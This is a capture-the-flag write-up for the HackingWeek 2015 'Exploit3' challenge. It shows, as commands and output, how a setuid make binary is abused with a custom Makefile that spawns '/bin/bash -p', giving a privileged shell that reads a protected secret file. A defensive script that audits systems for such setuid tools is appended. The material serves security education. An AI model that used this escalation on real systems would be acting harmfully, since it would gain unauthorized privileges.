English [HackingWeek 2015] [Exploit3] Write Up


Log on as guest (password: shu1eKoo) on machine
You will find the hidden validation key in /home/exploit03/.secret.

$> ssh guest@


The goal of this challenge is to read the /home/exploit03/.secret file, which is readable only by the exploit03 user and contains the flag.

By listing the /home/exploit03/project/ directory, we can see these files:

guest@ns314076:/home/exploit03/project$ ls -la
total 1704
dr-xr-xr-x 2 exploit03 exploit03 4096 Apr 30 23:47 .
dr-xr-xr-x 3 exploit03 exploit03 4096 Apr 29 15:47 ..
-r-sr-sr-x 1 exploit03 exploit03 549452 Apr 29 15:46 make
-r--r--r-- 1 exploit03 exploit03 1176037 Apr 30 23:47 make-3.81-alpha.tar.bz2
-r--r--r-- 1 exploit03 exploit03 269 Apr 29 15:46 Makefile

There are three files: make, make-3.81-alpha.tar.bz2 and Makefile. The most interesting one is the make binary, which is setuid (and setgid) exploit03, meaning that every time we launch it, it runs with exploit03's rights. Pretty interesting, knowing that we have to read one of exploit03's files :).

So, with this piece of information, what can we do? Launch the make binary? OK, but it won't read the .secret file. It only reads the Makefile to know what to do.
It would be cool to modify the Makefile to insert something like… /bin/sh? 😉
Unfortunately, the Makefile is read-only, meaning that we can't modify it. Pretty annoying, isn't it?

But hey, wait a minute!? THIS Makefile is read-only; what about creating our own Makefile and using it instead of this useless one?
OK, let's try this!

First, we check man make to be sure that we can use a Makefile located in another directory.

guest@ns314076:/home/exploit03/project$ man make

make - GNU make utility to maintain groups of programs

make [ -f makefile ] [ options ] ... [ targets ] ...


-f file, --file=file, --makefile=FILE
Use file as a makefile.

Hmmm… Seems pretty good, no?! Now we just have to create a new Makefile:

guest@ns314076:/home/exploit03/project$ cd /tmp
guest@ns314076:/tmp$ mkdir me
guest@ns314076:/tmp$ cd me
guest@ns314076:/tmp/me$ nano Makefile
guest@ns314076:/tmp/me$ cat Makefile
CP = /bin/cp
CHMOD = /bin/chmod

DIR = make-3.81-alpha

.PHONY: install clean

all: $(DIR)/make
	/bin/bash -p

Then we launch make with this new awesome Makefile. If everything goes well, we should get a shell with exploit03 rights and be able to read the .secret file!

guest@ns314076:/tmp/me$ /home/exploit03/project/make -f ./Makefile all
/bin/bash -p
bash-4.2$ cat /home/exploit03/.secret
bash-4.2$ exit

Perfect! The flag of this chall is uY2Waed3ie
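
The root cause above is a setuid bit on a tool that runs whatever its input file says, so here is an audit script for that condition, added as an example and not part of the original write-up. The EXEC_TOOLS list, the severity labels and the "helper" file are assumptions made for illustration, and the sample tree is constructed from the modes shown in the listing.

```shell
#!/bin/sh
# Added example (not from the original write-up): list setuid/setgid files
# under a directory and rank the ones that run commands by design.

# Assumed, non-exhaustive list of such tools, chosen for this illustration.
EXEC_TOOLS="make gmake sh bash dash env find awk vi vim nano perl python"

# audit_setid ROOT
# Prints one line per finding: "SEVERITY MODE OWNER PATH".
audit_setid() {
    # -perm -4000 matches setuid, -perm -2000 matches setgid.
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r path; do
        ls -ld "$path" | {
            # ls -l fields: mode, link count, owner, then the rest.
            read -r mode links owner rest
            sev=REVIEW
            for tool in $EXEC_TOOLS; do
                if [ "${path##*/}" = "$tool" ]; then sev=HIGH; fi
            done
            printf '%s %s %s %s\n' "$sev" "$mode" "$owner" "$path"
        }
    done
}

# build_sample DIR
# Constructed sample: empty files carrying the modes from the listing above,
# plus a hypothetical setuid "helper" to show the lower-severity case.
build_sample() {
    mkdir -p "$1/project"
    : > "$1/project/make";     chmod 6555 "$1/project/make"
    : > "$1/project/Makefile"; chmod 0444 "$1/project/Makefile"
    : > "$1/project/helper";   chmod 4555 "$1/project/helper"
}

# Usage: audit_setid /home    (or: build_sample /tmp/demo; audit_setid /tmp/demo)
```

A HIGH line means the setuid/setgid bit should be removed from that file; REVIEW lines still need a check of what the program does with caller-supplied input.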


The lsd
